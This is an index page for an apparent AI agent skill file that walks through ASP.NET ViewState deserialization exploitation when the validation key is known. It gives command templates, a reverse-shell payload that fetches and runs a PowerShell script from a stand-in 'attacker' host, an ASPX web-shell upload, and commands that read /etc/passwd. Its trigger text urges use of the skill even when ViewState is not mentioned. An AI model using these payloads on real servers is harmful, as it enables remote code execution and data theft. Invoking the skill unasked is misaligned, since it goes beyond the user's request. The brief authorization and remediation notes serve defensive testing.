OpenSkillIndex← back to search

Hacktricks-skills aspnet-viewstate-exploit

How to exploit ASP.NET ViewState deserialization attacks when the secret key is known. Use this skill whenever you need to test ASP.NET applications for ViewState vulnerabilities, analyze ViewState tokens, perform deserialization attacks on .NET applications, or work with __VIEWSTATE parameters. Make sure to use this skill for any ASP.NET security testing involving ViewState, even if the user doesn't explicitly mention 'ViewState' or 'deserialization'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret/SKILL.MD
source content

ASP.NET ViewState Deserialization Exploitation

This skill guides you through exploiting ASP.NET ViewState deserialization vulnerabilities when the validation secret key is known or can be obtained.

Background

ASP.NET ViewState is a mechanism for preserving page and control values between postbacks. When 

ViewStateMac
is enabled but the validation key is compromised, attackers can forge ViewState data to execute arbitrary code.

When to Use This Skill

  • You have access to an ASP.NET application's ViewState token
  • You know or can obtain the ViewState validation secret key
  • You need to test for deserialization vulnerabilities in .NET applications
  • You're analyzing 
    __VIEWSTATE
    parameters in web requests
  • You need to generate malicious ViewState payloads

Prerequisites

  1. ViewState Token: Extract from the target page's HTML or HTTP requests
  2. Validation Secret Key: Must be known or obtained through other means
  3. Target Information: ASP.NET version, application configuration

Tools Required

ViewStateExploiter

A Python tool for ViewState manipulation:

pip install viewstate-exploiter

Alternative: Custom Scripts

See 

scripts/
directory for helper scripts.

Exploitation Workflow

Step 1: Extract ViewState Information

Extract the 

__VIEWSTATE
parameter from the target page:

# From HTML
# Look for: <input type="hidden" name="__VIEWSTATE" value="..." />

# From HTTP requests
# Use Burp Suite, browser dev tools, or curl

Step 2: Analyze ViewState Configuration

Determine the ViewState settings:

  • Is 
    EnableViewStateMac
    enabled? (Required for this attack)
  • What encryption algorithm is used? (AES, 3DES, etc.)
  • What is the validation key?

Step 3: Generate Malicious Payload

Use ViewStateExploiter to create a malicious ViewState:

# Basic command structure
python viewstate-exploiter.py \
  --command "your-command-here" \
  --secret "your-validation-key" \
  --viewstate "extracted-viewstate" \
  --output malicious_viewstate.txt

Step 4: Inject and Test

Replace the original 

__VIEWSTATE
with your malicious version and submit the form.

Common Commands

Command Execution

# Windows
--command "cmd.exe /c whoami"

# Linux
--command "id"

File Operations

# Read file
--command "cat /etc/passwd"

# Write file
--command "echo 'test' > /tmp/payload.txt"

Payload Examples

Reverse Shell

# Generate reverse shell payload
python viewstate-exploiter.py \
  --command "powershell -c ""IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')""" \
  --secret "your-secret-key" \
  --viewstate "original-viewstate"

Web Shell Upload

# Upload ASPX web shell
python viewstate-exploiter.py \
  --command "echo '<%System.Diagnostics.Process.Start(Request[""cmd""])%>' > /path/to/shell.aspx" \
  --secret "your-secret-key" \
  --viewstate "original-viewstate"

Troubleshooting

ViewState Validation Failed

  • Verify the secret key is correct
  • Check if the key format matches (base64, hex, etc.)
  • Ensure ViewStateMac is enabled on the target

Payload Not Executing

  • Check ASP.NET version compatibility
  • Verify the command syntax for the target OS
  • Ensure the application pool identity has permissions

Encryption Algorithm Issues

  • Try different encryption algorithms (AES, 3DES)
  • Check if the target uses custom encryption

Security Considerations

  • Authorization: Only test systems you have permission to assess
  • Documentation: Document all findings and payloads used
  • Cleanup: Remove any files or changes made during testing
  • Reporting: Provide clear remediation guidance

Remediation Guidance

For Application Owners

  1. Never hardcode validation keys in source code or configuration files
  2. Use machineKey with strong, unique keys per application
  3. Keep ASP.NET updated to patch known vulnerabilities
  4. Implement proper access controls to prevent ViewState manipulation
  5. Consider disabling ViewState if not needed

Configuration Example

<system.web>
  <machineKey validationKey="AutoGenerate" decryptionKey="AutoGenerate" validation="SHA1" decryption="AES" />
</system.web>

References

Related Skills

  • ASP.NET deserialization attacks
  • .NET binary exploitation
  • Web application security testing
  • Burp Suite extensions for ViewState